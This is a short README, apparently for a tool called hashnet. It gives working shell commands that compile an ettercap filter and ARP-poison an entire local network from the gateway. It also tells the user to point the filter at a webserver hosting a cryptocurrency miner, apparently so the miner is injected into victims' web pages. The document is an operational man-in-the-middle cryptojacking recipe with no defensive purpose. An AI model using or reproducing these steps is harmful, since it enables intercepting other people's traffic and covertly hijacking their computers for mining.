oxagast/hashnet/README.md

 /etc/init.d/apache2 restart
 etterfilter nethash.etterfilter -o nh.ef
 ettercap -T -M arp:remote -q -F nh.ef /192.168.0.1/ //
+CHANGE nethash.etterfilter file's ip in the perl script section to point to the webserver where you host the miner.

 Test it by going to 127.0.0.1/lm